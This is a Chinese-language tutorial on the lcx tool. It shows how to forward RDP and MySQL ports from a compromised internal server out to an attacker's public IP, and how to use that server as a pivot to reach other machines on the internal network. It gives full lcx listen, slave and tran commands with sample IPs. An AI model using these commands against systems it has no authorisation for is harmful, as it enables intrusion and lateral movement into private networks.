0x01 为什么要作端口转发?
如果外网服务器,我们直接连接其端口就能进行访问,不需要进行端口转发。所以端口转发常用于穿透防火墙。
0x02 快速使用
前提:你的计算机处于公网,被控制的计算机能访问外网
一般情况连接内网的3389需要4步:
1:确定被控制计算机的内网ip
2:被控制的计算机执行”lcx -slave 你的计算机ip 51 被控制计算机的ip 3389”
3:本机执行”lcx -listen 34 2389”
4:用mstsc 连接“127.0.0.1:2389”
在本机上运行:
lcx –listen 34 2389,说明一下这句指令的意思,这句话的意思就是监听本机的34端口然后将数据转发到2389端口,当然这里的34 2389端口是依心情而定,但是,必须要注意这些端口也不能使用那些本机已经开放的端口。
内网服务器上运行:(拿到可执行权限作如下操作)
我假设:219.222.181.181为我自己的ip,192.168.0.2 3389为内网服务器的ip。
说说这句话的意思:slave为奴隶的意思,顾名思义,即内网服务器甘愿将自己的3389给219.222.181.181的34端口!
连接:现在所有步骤都完成了,就等着你进行连接了,不要告诉我到这个时候你还是不会连哦,到手的服务器都不要吗?
0x03 了解工具
这是lcx使用说明
Lcx有两大功能,一个是端口转发(listen和slave成对使用),另一个是端口映射(tran)。
端口转发:
Lcx -Listen <监听slave请求的端口(对应slave 的第二个参数)> <等待连接的端口>
Lcx -slave <你的ip> <监听端口(对应listen的第一个参数)> <目标ip> <目标端口>
所以既然我们只需要连接那台服务器,我们只需要设置目标ip参数为127.0.0.1就好了(127.0.0.1 Localhost 即本机)因为别忘了slave是在对面服务器执行的。当然了这里补充一点目标端口号是可以换的比如3306这样你就可以连接对面的MySQL数据库了。有些人肯定要问了如果把这个127.0.0.1换成其他的ip会怎么样,如果你尝试过了那么恭喜你发现了新功能,你可以访问更多的3389。
1、本机执行lcx -listen 40050 10000
2、被控制服务器执行 lcx -slave 1.1.1.1 40050 10.10.0.3 3389
3、连接成功之后中间就出现了一条通道,可以互相传输数据
4、我们打开mstsc 输入127.0.0.1:10000
Ok,这样我们就能访问内网的其他机子了,理论上来说被控制的服务器能访问到的我们都能访问,其实就是以被攻击的服务器做跳板。扩展一点讲,还记得listen的参数么?第一个是监听slave请求的端口,另一个监听端口,这个监听端口我们可以访问,当然别人也可以访问(一般用来共享)。
在1.1.1.1做好监听并且对面执行slave且成功的话1.1.1.2和1.1.1.3就可以用mstsc连接1.1.1.1:10000来访问到对面10.10.0.3的3389了。
端口映射:
Lcx -tran <等待连接的端口> <目标ip> <目标端口>
Lcx -tran 1920 127.0.0.1 21
这样我访问本机的1920端口就能访问到本机的ftp了,当然把127.0.0.1换成其他的ip都可以。
0x04 参考链接:
http://www.freebuf.com/sectool/126967.html